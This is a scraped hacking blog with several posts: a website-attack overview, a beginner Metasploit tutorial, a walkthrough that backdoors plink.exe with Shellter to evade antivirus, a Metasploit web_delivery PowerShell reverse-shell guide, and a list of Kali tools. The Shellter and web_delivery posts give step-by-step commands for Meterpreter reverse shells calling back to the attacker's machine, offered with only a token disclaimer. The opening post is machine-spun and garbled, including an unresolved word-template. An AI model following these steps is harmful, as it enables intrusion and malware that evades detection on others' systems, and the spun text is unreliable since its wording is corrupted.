Thursday, 3 March 2016

Best Techniques To Hack A Website Easly

Hii Friends Welcome To HacCoders. As per as I do know regarding hackers mind owing to my moral expertisethese days progressing to share with you all regarding the ways of website hacking. Hackers use totally different ways to focus on an internet site or a server to either steal sensitive info or use the server resources to spam or do different malicious activities.

Of course, the consequences of such associate degree attack may be devastating, and also, the worst half is after they use your server resources to perform totally different outlawed activities.
In this article, I will be able to list the highest half-dozen website security problems that you just ought to bear in mind of.

#1. Code Injection

Web sites that lack some kind of kind validation area unit liable to code injection. this happens once a code is injected into a malicious program or an internet application with the intention of adjusting the course of execution, to realize access to associate degree organization’s resources. These sorts of code injections may be fatalthey'll vary from completely destroying an internet site to stealing valuable user info.

In 2013, hackers managed to steal over $100,000 from 
associate degree ISP that's based mostly inAmerican state.so staying safe from code injection may be a shouldto shield your web site from this sort of attack, you wish to forestall any untrusted input like invalid characters from planning to your SQL info.

#2. SQL Injection 

SQL injection may be a code injection technique that's want to manipulate a website’s information.this way of attack is employed by hackers to focus on dynamic CMS information bases likeWordPress to steal data and different valuable info.
SQL injection is additionally the foremost common form of application layer attack techniques that used nowadays. this sort of attack affects net applications that ar improperly coded and permits the hacker to inject SQL commands into any login type, that permits them a straightforward access to the information that's command at intervals your information.

#3. Cross Site Scripting (XSS)

XSS may be a form of security vulnerability that's found in net applications, within which a hacker injects a client-side script into trustworthy web pages or URLs that permits them to steal sensitive user information or the other information.
XSS may also enable Associate in Nursing offender to control an internet page and shows it as if it’s a login screen to the guests. Associate in a Nursing example of this attack was discovered to have an effect on WordPress four.2 comments, that enabled the attackers to compromise a website mistreatment the comments.

Easy Way To Hack Website in 2016 

To check for XSS vulnerability, you'll use an internet Vulnerability Scanner. net Vulnerability Scanner scans your website and checks whether or not it’s XSS vulnerable or not. it'll tell you which of themURLs or scripts ar prone to these attacks in order that you'll fix it. WVS will check for any SQL injections or the other net vulnerability.

#4. Brute-force attack

Brute-force attacks work by shot your username and word till it finds the proper combination. Weak passwords will simply be guessed by this attack, that’s why it’s powerfully suggested to use strong/hard to guess passwords.
To protect yourself from this attack is easy; {you will|you'll|you'll be able to} merely block information science addresses that area unit taking an excessive amount of server resources otherwise you can use multi-factor authentication, and don’t forget to use sturdy passwords.

#5. Denial of Service Attack (DoS)

The most infamous types of an attacks area unit the DoS attacks. just because any hacker will bombard the victims website with innumerable requests, that causes the server to crash. DoS attacks don't seem to be hacking attacks, however, they're merely accustomed take down an internet site. This, after all, makes the website go offline and it needs manual intervention from the webmaster to bring it back on-line.

Moreover, AN assailant can even send you spam email messages to attack your email account. Since your email account is equipped for a free service like Outlook, you're given a restricted quota, that limits your account to a definite quantity of knowledge that you simply will send. By spamming your email messages, AN assailant will consume your entire quota, preventing you from receiving from now on messages. Imagine you open your email account someday and you see thousands of spam messages.

#6. Unencrypted Protocols

Any protocol that's unencrypted will enable AN assailant to steal valuable info from your users. Thus, it’s continually most well-liked and suggested to use the quality security encoding technology known as “Secure Sockets Layer” or SSL for the brief, whenever there’s personal info being changed between your website and also the information.
SSL works by providing a secure channel between 2 machines that's operative over the net or an inside network. This protocol is employed once a browser must connect with an internet server firmly over the net while not the spying eyes of the hackers.

#How to protect your website

If you're employing a Content Management System (CMS) like Joomla or WordPress, then buy their blogs, scan their latest articles and continually keep your CMS up to this point. Keep all of your third party plugins up to this point. Remember, any forms that modify users to transfer something can be a possible threat. These threats can modify AN assailant to own full access to your information. therefore, listen to what your users area unit uploading and scan these files before you approve it.

Install security plugins for your CMS and keep them up to this point. ensure you recognize the way to assemble it properly to maximize its defense.If you engineered your own CMS/website that has AN admin login type, then don’t use the default admin name, eg: rather than “adminlogin.php”, why not decision it “something.php” etc.

Test your website for any vulnerability. Use the free trial of net Vulnerability Scanner to check your website. Make sure you're mistreatment sturdy passwords and newer share them with anyone. Keep these passwords in an exceedingly safe place. It’s judicious to not store them on your PC simply just in case your PC gets hacked.

Saturday, 6 February 2016

Metasploit Full Tutorials Beginners To Professional

metasploit tutorials beginners to progessianal


The Metasploit Framework (MSF) is far more than just a collection of exploits. It’s an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment, and not have to reinvent the wheel. I consider the MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment.
This course has been written in a manner to encompass not just the front end “user” aspects of the framework, but rather give you an introduction to the capabilities that Metasploit provides. We aim to give you an in depth look into the many features of the MSF, and provide you with the skill and confidence to utilize this amazing tool to its utmost capabilities.


Normally to update Metasploit, you simply run “mfsupdate”, but according to the Rapid 7 website,
Metasploit updates are synced to update weekly with Kali.


Metasploit Overview

You can start Metasploit Simple Type On Terminal "msfconsole"
Once Metasploit loads you will see the following main screen and be given an “msf >” prompt.

metasploit tutorials beginners to progessianal

Metasploit can be a little confusing if you have never used it before, but once you get used to how it works, you can do some amazing things with it.

Basically, using Metasploit to attack a target system usually involves:

1. Picking an Exploit
2. Setting Exploit Options
3. Picking a Payload
4. Setting Payload Options
5. Running the Exploit
6. Connecting to the Remote System
7. Performing Post Exploitation Processes

The screenshot below shows an example of this process, but don’t worry; we will cover the process in much more detail as we go along.

metasploit tutorials beginners to progessianal

Depending on the type of exploit, once our exploit is complete we will normally end up with either a remote shell to the computer or a Meterpreter shell.

A remote shell is basically a remote terminal connection or a text version of a remote desktop for Windows users. It allows us to enter commands as if we are sitting at the keyboard.

But a Meterpreter shell offers a ton of interesting programs and utilities that we can run to gather information about the target machine, control devices like the webcam and microphone, or even use this foothold to get further access into the network.

And of course, if needed, you can drop to a regular shell at any time.

In most cases, depending on what you are trying to do, a Meterpreter Shell is much more advantageous than just a regular shell.

We will discuss the Meterpreter Shell later, but for now let’s quickly cover the first five steps.

Tech Note:
When all else fails and you start to feel lost in
Metasploit, or the Meterpreter shell, try typing
the “help” command.
You can also use the “tab” key to autocomplete a
line or hit it twice to show all available exploits
and payloads.

Ex. show exploits <tab><tab>

Picking an Exploit

If you are a glutton for punishment and want to view all the exploits, just type “show exploits” from the msf prompt:

msf > show exploits
But it is easier to use the search command to find what you are looking for. Simply type “search” and then the information you want. Sometimes being very specific will help you find the exploit you want quicker.

Tech Note:
If you see an error that says, “[!] Database not
connected or cache not built, using slow
search” all you need to do is start the PostSQL
Database before running msfconsole (though
your search will work without it running, it will
just be slower).
To start the Database at a terminal prompt, type
the following:

● service postgresql start
● service metasploit start
● msfconsole
Metasploit allows you to search for exploits in multiple ways, by platform, or even CVE (Common Vulnerabilities and Exposures) and bugtrack numbers.
Type “help search” to see all of the options:

metasploit tutorials beginners to progessianal

To search by name, just type search and the text you want. So for example to see if Metasploit has an exploit for Microsoft’s Security Bulletin MS13-069 vulnerability:

metasploit tutorials beginners to progessianal

To see a specific CVE ID number:

metasploit tutorials beginners to progessianal

To see all the CVE ID’s from this year (truncated list):

metasploit tutorials beginners to progessianal

Or to see exploit information for a particular program just use its name:

msf > search unreal

When you see an exploit that you want to know more about, just copy and paste the full path name and use the info command:

msf > info exploit/unix/irc/unreal_ircd_3281_backdoor

This will display the full information screen for the exploit:

metasploit tutorials beginners to progessianal

The information screen shows the author’s name, a brief overview (not shown) along with the basic options that can be set, a description and website security bulletin references for the exploit (shown).

As you can see in the picture above, we can set a couple options for this exploit, which leads us into our next section.

But before we set our exploit options, we need to “use” it. Once we know we have the exploit we want, we simply run the “use” command with the exploit name. Again copying and pasting the exploit
path and name works very well here too:

metasploit tutorials beginners to progessianal

Okay, we are now using our exploit, so how do we set the options?

Setting Exploit Options

Setting options in Metasploit is as simple as using the “set” command followed by the variable name to set and then the value.

set <Variable Name> <Value>

Tech Note:
LHOST = Local Host, or our
Kali System
RHOST = Remote Host, or
our target System
LPORT = Port we want to
use on our Kali System
RPORT = Port we want to
attack on our target System

To set what variables can be set, use the “show options” command:

metasploit tutorials beginners to progessianal

This exploit only uses two main variables, RHOST and RPORT. Rhost is the remote host that we are attacking and Rport is the remote port.

Let’s go ahead and set the RHOST variable using the set command. If the target system’s IP address was then we would use the set command below:

metasploit tutorials beginners to progessianal

If we run the “show options” command again, we can see that the variable has indeed been set:

metasploit tutorials beginners to progessianal
This is all you really need is set in this exploit. You could now run the “exploit” command to execute it.
If you are feeling a bit lost, don’t panic, we will cover this in more detail in the Metasploitable chapter.

Multiple Target Types

The Unreal backdoor was a fairly easy exploit to use. Some exploits have multiple variables that you need to set and they might even have some optional variables that can also be configured.

As you use Metasploit, you will find that some have multiple target types that can be attacked, and that the exact target needs to be set for the exploit to work properly. To see the target, enter “show targets”.

On the exploit we used above, the target is automatic, so we don’t need to set it.

metasploit tutorials beginners to progessianal

But on others, there are numerous targets and we need to pick the right one.

Getting a remote shell on a Windows XP Machine

We took a brief look at one of the Linux exploits, let’s go ahead and run through the ms08-067 exploit
as it is one of the more popular Windows exploits.

1. To start, simply use the exploit:
msf > use exploit/windows/smb/ms08_067_netapi

2. Now type, “show options”:

metasploit tutorials beginners to progessianal

Notice that by default the target is set to “Automatic Targeting”. I have had mixed results with using automatic targeting, and sometimes things work better if you set the exact target.

3. If we want to set a specific target type, “show targets”:

metasploit tutorials beginners to progessianal

4. Then type, “set target <ID#>” to set the actual target

metasploit tutorials beginners to progessianal

5. And again a “show options” will reveal that we indeed have the target value set:

metasploit tutorials beginners to progessianal

Lastly, though not often used in regular exploits, we can also set advanced options if we want.
To show the advanced options, just type “show advanced”:

metasploit tutorials beginners to progessianal

Now we have seen how to select an exploit and how to set the options. On many exploits we also
need to set a payload.

Picking a Payload

What’s the fun of exploiting a machine if you can’t do anything with it? Payloads allow you to do something functional with the exploited system.

Metasploit comes with a multitude of different payloads that you can use. To see them, just type
show payloads”:

metasploit tutorials beginners to progessianal

Or you can type “set payload” and hit the tab key twice. This will prompt Metasploit to ask you if you
want to see all the available payloads:

Most of the payloads are laid out in the format of ‘Operating System/Shell Type’ as shown below:
● set payload/osx/x86/shell_reverse_tcp
● set payload/linux/x64/shell_reverse_tcp
● set payload/windows/shell_reverse_tcp
● set payload/windows/meterpreter/reverse_tcp

Simply select the correct OS for your target and then pick the payload you want.

The most popular types of payloads are shells, either a regular remote shell or a Meterpreter shell.

If we just want a remote terminal shell to remotely run commands, use the standard shell. If you want the capability to manipulate the session and run extended commands then you will want the Meterpreter shell (which we will discuss in further detail in the next chapter).

There are different types of ways that the payloads communicate back to the attacking system. I usually prefer reverse_tcp shells as once they are executed on the target system, they tell the attacking machine to connect back out to our Kali system.

The big advantage to this is that with the victim machine technically “initiating” the connection out, it usually is not blocked by the Firewall, as a connection trying to come in from the outside most likely will.

Once we know what payload we want to use, we set it using the “set” command.

6. So for our example let’s use a Meterpreter shell for a Windows system and have it connect
back to us via TCP:

metasploit tutorials beginners to progessianal

Now that our payload is set, we just need to set the options for it.

Setting Payload Options

Payloads have options that are set in the exact same way that the exploit is set. Usually payload settings include the IP address and port for the exploit to connect out to.

And these too are set with the “set” command.

7. Type “show options” to see what settings the payload needs:

metasploit tutorials beginners to progessianal

As you can see in the image above, a new section titled “Payload options” shows up when we run the command. We also have three new options that we can set, “EXITFUNC, LHOST, and LPORT”.

We will leave the EXITFUNC and LPORT settings to the default.

8. But we need to put in the LHOST or local host address. This is the IP address for our Kali system:

metasploit tutorials beginners to progessianal

Once our payload options are set, we can go ahead and run the exploit.

Running the Exploit

When starting out, it is always a good idea to run the “show options” command one last time and double check that everything is set correctly.

metasploit tutorials beginners to progessianal

If you notice above, looks like we forgot to set the target system (RHOST) IP address!

We set the RHOST for a prior example, but when we switched exploits, we never re-set the remote
host IP address. This can happen when you are running through a lot of exploits, or attacking different
systems, so it is a good idea to double check your settings.

9. Set the RHOST option by typing:

Checking the options one last time, everything looks good:

metasploit tutorials beginners to progessianal

Our payload is selected, and all the options that we need to set are set.

We can now run the exploit.

10. To do so, simply use the “exploit” command.

metasploit tutorials beginners to progessianal

The exploit then runs and when successful the payload executes and if the exploit works, we get a
remote connection.

Connecting to a Remote Session

Once we have a successful exploit we will be able to view any remote sessions that were created. To
check what sessions were created type the “sessions” command.

Any sessions that were created will show up along with the IP address, computer name and user name
of the target system.

metasploit tutorials beginners to progessianal

We can now connect to the session interactively with the “sessions -i <ID#>” command as shown in the sample session above.

When we connect to the session, the prompt will change into a meterpreter prompt:

metasploit tutorials beginners to progessianal

We will cover the Meterpreter shell in more depth in the next chapter. But for now, if we just type the “shell” command we can see that we do indeed have a remote shell to the Windows system.

Thursday, 4 February 2016

Anti-Virus Bypass With Shellter 6.0 On Kali Linux

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

Hello Every One Welcome To HacCoders (Information You Can Trust!).. So Today We Will Discuss Anti-Virus ByPass With Shellter.. But First Know What Is Shellter Because Many People Don't Know What is Shelter.. So Let's Start... :)

What Is Shellter..

Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).

The shellcode can be something yours or something generated through a framework, such as Metasploit.
Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application, and this is just the tip of the iceberg.

 Shellter is not just an EPO infector that tries to find a location to insert an instruction to redirect execution to the payload. Unlike any other infector, Shellter’s advanced infection engine never transfers the execution flow to a code cave or to an added section in the infected PE file.

So enough talk, let’s see it in action!

(Note: As always, never attempt to access a system that you do not have express written permission to do so. Doing so is illegal and you could end up in jail.)

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )
I saved the extracted folder to the /root/Desktop folder. You will need to make the shellter.exe file executable with the chmod command.
2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.
3. Change to the ‘/root/Desktop/shellter’ directory.
4. Start Shellter – type, “wine shellter.exe”

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

5. Enter “A” for automatic
6. At the PE Target Prompt, enter “plink.exe
7. When prompted to enable stealth mode enter “Y”:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

This new feature allows the backdoored file to still function as originally file. A big help for Red Team pentesters.

8. When prompted for Payloads select “L” and then “1” for Meterpreter_Reverse_TCP.
9. Enter your Kali IP address for LHOST.
10. Enter a port to use (I used 4545)

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

Shellter will then add PolyMorphic code and Obfuscate the file. When done you will see:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

You will now have a ‘plink.exe’ (the shellcoded file) and ‘plink.exe.bak’ (the original file) in the Shellter directory.

11. Now we need to start a listener service on the Kali system using the same settings from above:
  • start Metasploit (‘msfconsole’ in a terminal)
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost
  • set lport 4545
  • exploit
Anti-Virus Bypass with Shellter 5.1 on Kali Linux

12. Copy the ‘plink.exe’ file to the Windows system:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

13. Now, in Windows, If you run plink.exe from the command prompt:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

It lists the help information for the file, but does not trigger the remote shell yet. But if we actually use plink to connect to another system (a Raspberry Pi) as seen below:
Anti-Virus Bypass with Shellter 5.1 on Kali Linux

Notice we get the Raspberry Pi ssh login prompt through Plink, but we also get a remote session to the Windows box:
Anti-Virus Bypass with Shellter 5.1 on Kali Linux

We can run “sysinfo” to view information about the computer:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

So We Are Sucsess.. Thanks For Reading..

Wednesday, 3 February 2016

Easy Remote Shell With Web Delivery

Easy Remote Shells with Web Delivery

Hello Friends Welcome To HacCoders.. Today We Will Discuss To Get Windows Remote Shell Using Metasploit With Web Delivery Module.. So Let's Start..

Web Delivery

In this section we will learn how to  using the Web Delivery exploit module. We will be using Metasploit and our Windows 7 VM as the target.

Let’s get started!

1. From a Kali terminal, type “msfconsole”:

Easy Remote Shells with Web Delivery

2. Now enter:
  •  use exploit/multi/script/web_delivery
  •  set lhost [Kali IP Address]
  •  set lport 4444
3. Type, “show targets”:

Easy Remote Shells with Web Delivery

Notice we have 3 options, Python, PHP and PSH (PowerShell). We will be attacking a Windows system, so we will use PowerShell.

4. Enter, “set target 2”
5. Set the payload, “set payload windows/meterpreter/reverse_tcp”
6. You can check that everything looks okay with “show options”:
Easy Remote Shells with Web Delivery

7. Now type, “exploit”:

Easy Remote Shells with Web Delivery 

This starts a listener server that hosts our payload and then waits for an incoming connection. All we need to do is run the generated PowerShell command on our target system.

8. On the Windows 7 system, open a command prompt and paste in and execute the PowerShell command:

Easy Remote Shells with Web Delivery

And after a few seconds you should see:

Easy Remote Shells with Web Delivery

A meterpreter session open!

9. Now type, “sessions” to list the active sessions
10. Connect to it with “sessions -i 1”

Easy Remote Shells with Web Delivery

We now have a full Meterpreter shell to the target:

Easy Remote Shells with Web Delivery

Type “exit” to quit the active session and “exit” again to exit Metasploit. I hope you enjoyed this chapter section preview. In the full chapter, I show how Web Delivery can be set to work against Linux and Mac systems also.

So We Will Successfully Get Windows Remote Shell Using Metasploit..

NOTE: This Is Only For Educational Purpose. I Will Not Be Responsible For Anything Done By You.


Tuesday, 2 February 2016

20 Fantastic Kali Linux Tools

20 Fantastic Kali Linux Tools

Tools for Phase One

Information Gathering and Analysis

Kali Linux has a wonderful set of tools for gathering data on your target. The end goal of phase one is to have a logical map of the target’s network, both of people and of machines.

Any information discovered now may be key to a pivot later on, so thoroughness is your ally. Most tools in this stage are very quiet, so if time is not a critical factor in your attack, this is the best time to move slowly and dig deep. The more you sweat now, the less you’ll bleed later.

1. DNSenum Enumerating the Servers

The first high level maps of an organization’s network will come from locating its DNS servers. Starting with a good foundation here will help you find the key footholds you’ll need later. DNSenum is a high level tool that is very often the first step in mapping your targets network. Using the format ...
 ./dnsenum enum [TARGET DOMAIN NAME]
… we can begin enumeration of the higher level servers available to our target.

2. dmitry The Network Rangefinder

Once your DNSenum information has come back, you will have a range of servers used by your target. The goal of the dmitry rangefinder is to find out which IP’s are used on those servers. This is done using a TCP traceroute command which canbe threaded, and displayed graphically with dmitry commands. 

3. Nmap

The Nmap (Network Map) project is famous for its standalone application and open source code. The Nmap tool in Kali Linux is used to determine if a host is alive, active, and gives a bounty of other information in one quick scan. Nmap is an essential tool for quickly gathering specific details on any active machine.

“Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.”

To add to the beauty, the Nmap scan can gather all of this information off only a handful of packets tossed around in such a way as to be quieter than many other available tools.


Maltego is an excellent builtin tool from the development team at Paterva technologies. The design is unique and with a little time spent learning how to best play with it, Maltego quickly becomes an essential tool for any medium to large scale penetration test. 

The system is built to determine relationships between actors in an environment. This could be a name, a DNS server, an IP address, a WHOIS lookup, or any number of other bits of information. Maltego will do some rooting around and come up with a logical map that displays these relationships visibly. In invaluable tool for the critical penetration tester, these logical maps will shed light on a messy situation, or reaffirm suspected relationship links.

Once all your information gathered from DNSenum, dmitry, and Nmap has been poured over and filtered into Maltego, a clean and clear logical map of your target’s environment can be formed.

5.Social Engineering Toolkit

The Social Engineering Toolkit (SET) is designed to help the penetration tester work against the human elements of the target’s security environment. Working with a wide variety of tools, SET enables the attacker to exploit weaknesses in security training, as opposed to weaknesses in hardware or software. 

Social Engineering takes on a different attack path at first glance, but information gained through social engineering attacks can quickly be turned into a serious advantage for the penetration testing team. SET can be accessed by opening terminal and entering. “setoolkit”. 

Experience working with java applets will be helpful when working with SET to plan attacks. SET can also be used during Phase Four : Exploitation, to deliver clickables that will help gain access to a target’s machine. Personally I find it most useful in the information gathering stages, although it can be more invasive and louder depending on the level of security awareness in the target environment.

Tools for Phase Two

Vulnerability Detection and Enumeration

6.Nessus Working With Vulnerabilities

Taking your logical map from Maltego, and the wealth of technical information gathered from the time spent in Nmap, it’s time to find vulnerabilities that lie in the target’s system. Neesus takes command of the next step, finding vulnerabilities in the local system, in the local network, and in both Linux and Windows environments. 

When checking a network for vulnerabilities, Neesus is as thorough as tools come. Although Neesus works on Kali Linux, it is not bundled with the download, and will need to be downloaded and unpackaged on the Kali Linux OS. Registration through the Neesus website is also required to run this tool.

7. OpenVAS Open Vulnerability Assessment System

OpenVAS is bundled and packaged with Kali Linux, but is less polished than its cousin. Both OpenVAS and Neesus work to discover vulnerabilities in local systems. networks, and operating systems. After running all your gathered information through one or both of these tools, you will have a list of vulnerabilities that will prove essential in getting into the target system. 

Using the targeting data we gathered in phase one, you can set OpenVAS to scan each machine in the target’s network for vulnerabilities. After this detailed scan, you can take a step back and scan the target network itself for vulnerabilities. The list of weaknesses is long and varied, and will give the attackers essential data to help target a specific vulnerability to exploit.

At this phase, penetration testers will take the logical maps of the environment, and the list of exploitable vulnerabilities gathered in phases one and two. In a team of attackers, this is the perfect time for a brief pause and gathering of the troops. Up until this point most of the tools used were relatively quiet and noninvasive, and while Kali Linux is generally a very quiet set of tools, the pattern of attacks from here on out is necessarily noisier, and a lot more rides on the quality of the defense. If the attacking team is properly prepared, choosing which attack vector to hit is the next key step.

Tools for Phase Three

Penetration Attempts

At this phase, penetration testers will take the logical maps of the environment, and the list of
exploitable vulnerabilities gathered in phases one and two. In a team of attackers, this is the
perfect time for a brief pause and gathering of the troops. Up until this point most of the tools
used were relatively quiet and noninvasive, and while Kali Linux is generally a very quiet set
of tools, the pattern of attacks from here on out is necessarily noisier, and a lot more rides on
the quality of the defense. If the attacking team is properly prepared, choosing which attack
vector to hit is the next key step.

Wifi Attacking

8. Aircrackng

Aircrackng is a valuable tool for injecting wireless packets into an active network. This tool relies on the attackers knowledge of wireless cards, both on the attacking machine and on the target machine, so before deploying Aircrackng in your offensive environment, Aircrackng can also recover 802.11 WEP and WPAPSK keys by gathering packets sniffed wirelessly. WEP attacks have been well known and well documented in the security community since at least 2007, but because of the nature of networked communication, injection attacks are still a very popular method of getting access to a network.

Web Application Attacking

9. Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.Burp gives you full control, letting you combine advanced manual techniques with stateoftheart automation, to make your work faster, more effective, and more fun.

10. Hydra

Web application exploitation is a growing source of headaches for defensive security teams worldwide. Hydra is an extremely fast password cracking tool which supports attacks in over 50 different protocols. However due to the nature of Hydra’s attack pattern, it’s much noisier than other methods of password cracking. The brute force methods of password stealing that Hydra allows are very effective and exceptionally fast, but this should be considered a fallback tool for highsecurity environments as it will increase your chances of being detected.

11. Owasp ZAP

For the securityminded, Owasp should be a familiar name. The Open Web Application Security Project is well known as one of the most respected and active open source security projects on the internet. Founded as a nonprofit in 2001, the Owasp team has been active in information security, development of penetration tools and digital freedom movements. ZAP is the “Zed Attack Proxy Project”. The tool is simple enough for new penetration testers, and robust enough for professional environments. Both passive and active scanners are built in, and brute force attacks can be used to break in and hunt for files even if there are no direct links to the files to be detected.

Password Attacks

12. John The Ripper

Known by the nickname “John”, John the Ripper is a well developed free password attacking tool developed as an all purpose attacking tool. Being able to call on different libraries of password guessing methods, from dictionary attacks to hybrid cracks to the cumbersome bruteforce methods used in other tools, John is a catchall for password guessing software.

13. Pass the Hash Toolkit

While John goes straight for the password in an attempt to reveal it, the Pass the Hash Toolkit enables attackers to gather the hash from an accepted password and use the data after the password is accepted to get through into systems without having to use noisy and slow password guessing techniques. In a very informative whitepaper out of the SANS institute, we get a good overview of PtH techniques, and where it fits in contextually with other penetration testing tools.

Phase Four


This is the real meat of any penetration test. All the above tools are used to gain information and access to a system. Some offensively minded security professionals find the early stages of a penetration test to be tedious and dry. I believe the first three phases are not unlike playing a game of chess, where phase four is the final execution of your intricate plans just before a checkmate. 

Exploitation is the proof of all the work you’ve done in mapping the system and opening the doors. Even more so than before, you must be careful not to permanently damage any systems you are testing. Make note and document that they could have been damaged, and when the time comes to present your findings, be clear and honest about the state of security. 

Doing permanent damage to a system is a quick way for a professional penetration tester to find himself unemployed and unemployable.

14. Metasploit Framework

The Metasploit Framework run through the Metasploit Framework Console is among the most advanced tools in the Kali Linux arsenal. The Metasploit team is legendary, and their work in the offensive infosec field is without parallel. Kali Linux itself was based on developing an OS that incorporated all the tools of Metasploit and Backtrack together. 

Metasploit itself could be considered an allinone penetration testing tool, and for many it still is. Of all the tools in this list, only Burp Suite comes close in robustness and polish that Metasploit offers, and the Burp Suite tools are a distant second when compared to the depth of Metasploit’s toolkit. Truly the top of the line for a dedicated offensive security professional. 

Metasploit offers tools that can be used in every phase of a penetration test, from passive information gathering tools to vulnerability scans. The most exciting portion of the toolkit comes at exploit payload development and delivery.  

Also Read Exploit OpenSSL Vulnerability Using Metasploit  

15.The Browser Exploitation Framework (BeEF)

BeEF is an excellent tool for exploiting vulnerabilities in the browser and browser cached information blocks. At the time of writing the BeEF tool in Kali Linux is still being smoothed out, with a couple errors and some general usability issues being touched up. 

BeEF specializes in clientside attacks, focusing on the web browser itself. No other tool on this list has reached the level of usability and specialization in specific location attacks as BeEF. With special methods of attacking a web browser, BeEF allows the attacker to hit the system directly from a security vector often overlooked by defensive development teams.

16. Armitage

Ignoring the quirky anime style of the website, Armitage is actually a very advanced tool for finding and executing exploits to allow the penetration testing team to gain access to a network. Bundled with Metasploit, Armitage is not the scriptkiddie plaything it appears to be stylistically, but is actually advanced enough for professional environments. 

With built in automation of many different attacks, and options to find and exploit several attack vectors on the same target, Armitage is a quality weapon in the arsenal even if it is branded in a peculiar way.

17. Yersinia

A relatively older tool launched by the S21Sec team in 2005, Yersinia has returned to popularity as a reliable tool that attacks Layer 2 network systems. Instead of more traditional attacks like ARP poisoning or cache attacks, Yersinia is able to go after switches and hubs. 

With many networks having limited defenses and poorly organized or configured networking hardware, Yersinia is a prime example of a tool striking where your target is weakest. Further, as these most defensive security tools guard web portals, databases and workstations, Yersinia is working in an environment where noise is the standard and detection is generally weaker.

18. Durandal’s Backdoor (DBD)

DBD is an new and often overlooked tool used to maintain access to compromised systems. This is an absolutely essential part of a successful penetration test, especially in light of recent high profile attacks to Home Depot and Target where attackers stayed in the system for weeks after gaining access. DBD is currently operating in only TCP/IP protocol. 

Reconnection testing is a less exciting part of exploitation, but key to making sure defensive systems have had their problems actually solved. Successful DBD testing will make sure the security hole was actually closed, instead of simply throwing the attackers out while leaving the door open.

19. Exploit Database (EDB)

While not directly an offensive exploit tool, the exploit database built in to Kali Linux is the best location for the most uptodate exploits available. Maintained by the Kali Linux, Metasploit, and Offensive Security teams, EDB is the possibly the best place on the internet to find exploits in any number of areas. Searchable by description, author, platform, type, language or port, EDB is currently holding over 30,000 known exploits at the time of writing.

Phase Five


20. RecordMyDesktop

While working with all the above tools, we leap over the line from safe to illegal andwork directly with tools that could easily break a business. The point of a penetration test is to attack an environment in a controlled way so the defenders can have accurate and honest information on their weaknesses. Offensive security is a defensive tool. As flashy as exploits may be, everything in your offensive arsenal comes down to a simulated attack. Wargaming is only as good as the lessons learned at the end. 

RecordMyDesktop is the least technical tool on this list, but in my opinion, the most important. Showing exactly how an exploit worked, and having a clear and objective record of the attack taking place will be essential for the analysis and cleanup stages after the penetration test has completed. Remember to ask questions when in doubt. The tools listed here can be used for great evil, and that’s exactly why they were included. Knowing the enemy is half the battle.

Keep yourself safe, and happy hacking.

Best Techniques To Hack A Website Easly

Hii Friends Welcome To HacCoders. As per as  I do know   regarding  hackers mind  owing to  my  moral   expertise .  these days  pr...